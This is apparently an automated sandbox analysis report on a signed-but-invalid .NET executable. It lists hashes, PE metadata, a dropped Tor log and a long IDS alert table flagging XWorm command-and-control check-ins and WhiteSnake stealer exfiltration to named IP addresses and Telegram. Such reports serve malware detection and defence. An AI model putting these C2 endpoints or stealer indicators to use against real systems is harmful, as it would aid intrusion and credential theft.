                                                                          SHA-512:BC460645DCF9FC3E7CAAC8DE86387930876C55EEAEA8307827A8BB2EDD8ACF873E43D3DBE8492B89766B26C7FFE9860E9EACD11F4751D8BEE109561364E7FEDD
                                                                          Malicious:false
                                                                          Reputation:unknown
Preview:
Jul 23 09:47:08.844 [notice] Tor 0.4.5.10 (git-fd74f7628eba2525) running on Windows 8 [or later] with Libevent 2.1.12-stable, OpenSSL 1.1.1l, Zlib 1.2.11, Liblzma N/A, Libzstd N/A and Unknown N/A as libc.
Jul 23 09:47:08.844 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jul 23 09:47:08.876 [notice] Read configuration file "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt".
Jul 23 09:47:08.876 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\Users\user\Desktop\<default>. Is this what you wanted?
Jul 23 09:47:08.876 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\Users\user\Desktop\<default>. Is this what you wanted?
Jul 23 09:47:08.876 [warn] ControlPort is open, but no authentication method has been configured. This means that any program on your computer can reconfigure your Tor. That's bad! You should upgrade your Tor controller as soon
                                                                          Process:C:\Windows\SysWOW64\timeout.exe
                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.41440934524794
                                                                          Encrypted:false
                                                                          SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                          MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                          SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                          SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                          SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.9600079887410775
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:yt7dW9nyJK.exe
                                                                          File size:465'416 bytes
                                                                          MD5:adbe420a49db30f75d4665ea0014af43
                                                                          SHA1:ed38f3bf9c5e56110cdf8c686bffee54128c51d6
                                                                          SHA256:b851e1ad3f4882815c89fa7754ed5dc89edfc0c2ea873a83a19f65299566e46d
                                                                          SHA512:a3ef38d66cebb762e5399c02b452773f6b8fc6290aacac4487f1ab4984665657ce9f56716ac83ca4f72d1a6d20e9899cd8d642d65664eeb4e0ede9891d9dfc17
                                                                          SSDEEP:12288:+jABvvWcHtP2EFK4U0ZPo4Y8Vv9IKBa8Zhp3BXkR:tXoh47Pj3l97Ha
                                                                          TLSH:27A412D3E174851BC751A5B12CFB44824B721223DB59D9AC3CDC02AFACC6B90A711BDB
                                                                          Icon Hash:3bb2b38d9df9e99b
                                                                          Entrypoint:0x46e58a
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x669EC730 [Mon Jul 22 20:55:12 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Signature Valid:false
                                                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                          Error Number:-2146869232
                                                                          Not Before, Not After
                                                                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                          Subject Chain
                                                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                          Version:3
                                                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                          Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6e538 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0x1074 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x6e400 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x6c590 | 0x6c800 | 4aebf293bc9c05213b392f5101e1ae5a | False | 0.9699943296370968 | data | 7.980169660583914 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x70000 | 0x1074 | 0x1400 | 50f7a9234169306752bc5aa701099f82 | False | 0.55703125 | data | 5.731086821483001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0xc | 0x400 | 34a5619fbd670711a875b8b391c5dafe | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x700c8 | 0xc60 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.7528409090909091
RT_GROUP_ICON | 0x70d38 | 0x14 | data | | | 1.05
RT_VERSION | 0x70d5c | 0x312 | data | | | 0.46055979643765904
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-23T15:48:17.144145+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:49:08.115309+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:49:00.111643+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:47:18.704467+0200 | TCP | 2522818 | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 819 | 9993 | 49730 | 95.217.36.40 | 192.168.2.5
2024-07-23T15:47:14.425934+0200 | TCP | 2522164 | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 165 | 8443 | 49725 | 140.78.100.15 | 192.168.2.5
2024-07-23T15:47:29.089437+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:51:08.101444+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:47:55.809501+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:50:35.053785+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:49:30.643021+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:50:17.025178+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:50:55.344407+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:49:51.219704+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:48:42.994902+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:49:41.798109+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:50:34.426686+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:50:18.078854+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:48:17.388843+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:49:20.859622+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:48:55.351253+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:50:08.098568+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:48:32.752127+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:48:38.301171+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:48:42.997421+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:48:08.085517+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:46:58.158263+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:48:32.600904+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:48:49.516790+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:48:17.520888+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:50:17.164999+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:48:06.169338+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:48:17.385354+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:49:00.114263+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:47:08.401044+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:49:20.861210+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:49:07.878611+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:49:47.627563+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:50:28.550933+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:49:37.604989+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:49:59.812040+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:50:17.026862+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
2024-07-23T15:50:35.461487+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 31510 | 49707 | 193.161.193.99 | 192.168.2.5
2024-07-23T15:48:55.353080+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49707 | 31510 | 192.168.2.5 | 193.161.193.99
                                                                          2024-07-23T15:50:06.117172+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:14.913229+0200TCP2045868ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)497268080192.168.2.5185.119.118.59
                                                                          2024-07-23T15:49:59.814406+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:29.251375+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:29.351289+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:28.384423+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:39.446554+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:17.517191+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:17.303596+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:47.625590+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:29.326585+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:46:58.148752+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:06.152311+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:27.721599+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:06.153707+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:28.552358+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.329349+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:29.253527+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.193724+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:34.559540+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:34.423220+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:06.676618+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:32.474944+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:36.175089+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:54.116548+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:18.704444+0200TCP2522292ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 293900149729193.142.146.239192.168.2.5
                                                                          2024-07-23T15:50:06.394192+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:06.167055+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:06.144575+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:18.223750+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:06.553033+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:55.572417+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:34.557718+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:36.170319+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:39.444702+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:17.148849+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:06.678354+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:32.602452+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:16.320433+0200TCP2045869ET MALWARE WhiteSnake Stealer Telegram Checkin49727443192.168.2.5149.154.167.220
                                                                          2024-07-23T15:50:44.963735+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:51:09.598849+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049423193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:29.102331+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:40.566832+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:55.345362+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:50.399527+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:47:55.807861+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:41.800241+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:39.086242+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:28.386113+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.191958+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:50.397806+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:08.078426+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:06.115543+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:38.107132+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:39.083440+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:40.565173+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:07.876303+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:18.076637+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:06.549041+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:49:37.602487+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:18.764664+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:35.463847+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:51.222887+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:51:06.142825+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:38.084252+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:48:32.750243+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:06.255943+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:38.083497+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:18.760725+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:17.163102+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:47:54.118696+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:55.576858+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:30.641371+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:35.327551+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:44.964749+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:48:49.518442+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:49:18.220763+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
                                                                          2024-07-23T15:50:06.398996+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970731510192.168.2.5193.161.193.99
                                                                          2024-07-23T15:50:38.094629+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3151049707193.161.193.99192.168.2.5
